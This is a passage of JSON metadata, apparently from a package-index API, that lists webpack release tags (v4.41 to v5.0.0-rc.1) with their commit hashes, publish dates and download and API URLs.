parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"h